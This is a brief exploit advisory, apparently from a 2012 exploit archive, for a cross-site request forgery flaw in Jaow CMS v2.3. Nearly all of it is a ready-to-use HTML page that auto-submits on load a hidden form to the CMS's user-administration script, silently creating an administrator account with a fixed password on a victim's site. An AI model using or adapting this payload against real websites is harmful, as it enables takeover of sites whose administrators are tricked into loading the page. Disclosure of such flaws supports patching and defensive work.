Jaow CMS CSRF Exploit

Summary

Jaow CMS v2.3 suffers from CSRF vulnerability.

Credit:

The information has been provided by DaOne.


Details

Vulnerable Systems:
 * Jaow CMS v2.3

[#] [ CSRF Add Admin ]

<html>
<body onload=’document.form0.submit();’>
<form method=’POST’ name=’form0′ action=’http://[target]/administration/utilisateur.php’>
<input type=’hidden’ name=’Nom’ value=’webadmin’/>
<input type=’hidden’ name=’Prenom’ value=’webadmin’/>
<input type=’hidden’ name=’Pseudo’ value=’webadmin’/>
<input type=’hidden’ name=’Mdp’ value=’pass123’/>
</form>
</body>
</html>

Disclosure Timeline:
Published: 2012-08-17

Categories: Exploits